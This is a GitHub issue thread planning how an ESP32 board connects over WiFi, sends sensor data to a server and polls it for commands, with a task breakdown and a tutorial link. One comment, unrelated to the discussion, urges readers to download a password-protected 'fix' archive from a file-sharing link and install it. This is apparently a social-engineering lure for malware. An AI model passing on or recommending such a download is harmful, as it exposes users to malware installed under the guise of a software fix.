### ISSUE TITLE
Make the board send information to the server

### ISSUE THREAD

**Issue by Asterki** [Asterki/octo-tree#67]
Here’s a breakdown of the subtasks and considerations for each of the things you want the hardware to handle:

### 1. **Way to Connect to the Internet (via WiFi)**
   - **Implement WiFiManager Library**:
     - Install the WiFiManager library.
     - Configure the ESP32 to use WiFiManager for network configuration.
     - Set up a fallback mechanism (e.g., reset settings or restart) in case the connection fails.
     - Customize the access point name and configuration portal (optional).

   - **Create a `/wifi` Endpoint (if needed)**:
     - Implement a web server on the ESP32 using the ESPAsyncWebServer library or the built-in WebServer library.
     - Define the `/wifi` endpoint to serve a simple web page allowing users to enter SSID and password.
     - Implement logic to handle form submissions and connect to the specified WiFi network.
     - Store the WiFi credentials securely in non-volatile storage (if not using WiFiManager).

   - **Considerations**:
     - Ensure that the WiFiManager or custom `/wifi` page works reliably in various network environments.
     - Minimize memory usage by avoiding unnecessary features in WiFiManager or custom implementation.
     - Provide clear feedback (e.g., via Serial, LEDs) to the user about the connection status.

### 2. **Make Requests to the Server (Only If WiFi is Connected)**
   - **Check WiFi Connection Status**:
     - Regularly check the WiFi connection status using `WiFi.status()` or similar.
     - Implement reconnection logic in case of disconnection.

   - **Send Sensor Data to the Server**:
     - Set up the ESP32 to read sensor values periodically.
     - Construct HTTP requests to send data to the server using libraries like HTTPClient or a lightweight alternative.
     - Implement error handling and retries for failed requests.
     - Optimize the frequency of data sending to reduce power consumption and network load.

   - **Considerations**:
     - Ensure that data is only sent when the WiFi connection is active.
     - Use lightweight protocols like MQTT if applicable to reduce overhead.
     - Include timestamping or unique identifiers in the data to handle out-of-order deliveries.

### 3. **Read Values from the Server to Execute Actions**
   - **Poll the Server for Commands**:
     - Set up periodic polling or subscribe to updates (if using MQTT) from the server to retrieve command data.
     - Parse the received data to determine what actions need to be executed.

   - **Execute Actions Based on Server Data**:
     - Map the server commands to specific actions (e.g., turning on/off devices, adjusting parameters).
     - Implement safety checks to ensure commands are valid and executable.
     - Provide feedback to the server about the execution status or any errors.

   - **Considerations**:
     - Ensure that command execution is reliable, even with intermittent connectivity.
     - Implement safeguards to avoid unintended or harmful actions due to network errors or malicious inputs.
     - Optimize the timing and frequency of server polling to balance responsiveness and resource usage.

### General Considerations:
   - **Security**:
     - Secure the communication between the ESP32 and the server using SSL/TLS if possible.
     - Ensure that the WiFi credentials and any other sensitive data are stored securely.
     - Implement authentication mechanisms if the server commands require secure access.

   - **Power Management**:
     - If the hardware is battery-powered, consider implementing deep sleep modes and only wake up for necessary tasks.
     - Optimize the frequency of WiFi connections and data transmissions to conserve energy.

   - **Reliability**:
     - Implement watchdog timers or similar mechanisms to recover from unexpected failures or crashes.
     - Test the system in various network conditions to ensure it behaves as expected.

Each of these tasks requires careful planning and testing to ensure that your hardware performs reliably and efficiently in a real-world environment.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Asterki** [comment]
Check the following site that may help in the development:
https://randomnerdtutorials.com/esp32-http-get-post-arduino/
